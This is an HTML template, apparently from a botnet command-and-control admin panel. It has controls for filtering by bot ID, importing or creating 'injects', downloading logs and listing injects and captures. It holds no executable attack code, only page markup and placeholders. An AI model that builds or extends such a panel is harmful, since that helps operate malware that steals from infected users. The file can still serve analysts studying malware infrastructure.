<div class="panel panel-default">
<!--
	<div class="panel-heading">
		<p class="panel-title" style="float: left">Filter</p>
		<p class="panel-title text-right">In Cap State: %CAPS_SZ%</p>
	</div>
-->
	<div class="panel-body">
		<div class="row">
			<form method="get">
				<input type="hidden" name="a" value="admin" />
				<input type="hidden" name="action" value="smarts" />
				<div class="col-md-3">
					<input type="text" name="filter" class="form-control form-control-sm" style="font-size: 12pt" placeholder="Bot ID or Comment" value="%FILTER_VALUE%" />
				</div>
				<div class="col-md-2">
					<input type="submit" class="btn btn-primary" value="Filter" />
					<a href="?a=admin&action=smarts"><input type="button" value="x" class="btn btn-warning" /></a>
				</div>
			</form>
			<div class="col-md-4">
			</div>
			<div class="col-md-3 text-right">
				<a href="?a=admin&action=smarts&sub_action=import"><input type="button" class="btn btn-success" value="Import / Create Inject" /></a>
				<a href="?a=admin&action=smarts&do=export"><input type="button" class="btn btn-info" value="Download Logs" /></a>
			</div>
		</div>
		
	</div>
</div>


<div class="row">
	<!-- left pane -->
	<div class="col-lg-12">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title" style="float: left">List of Injects (%INJECTS_SZ%) %FILTER_BOT_ID%</h3>
				<h3 class="panel-title text-right">
				Total logs: %LOGS_SZ%
				&nbsp;&nbsp;&nbsp;
				Show Caps: %CAPS_SZ%</h3>
			</div>
			<div class="panel-body">
				<div class="row">
					<div class="col-md-12">
						%INJECTS_LIST%
					</div>
				</div>
			</div>
		</div>
	</div>
	
	
	<!-- right pane
	<div class="col-lg-6">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">Preview &#151; <code>%PREVIEW_NAME%</code></h3>
			</div>
			<div class="panel-body">
				<div class="row">
					<div class="col-md-12">
					%PREVIEW%
					</div>
				</div>
			</div>
		</div>
	</div>
	 -->
</div>
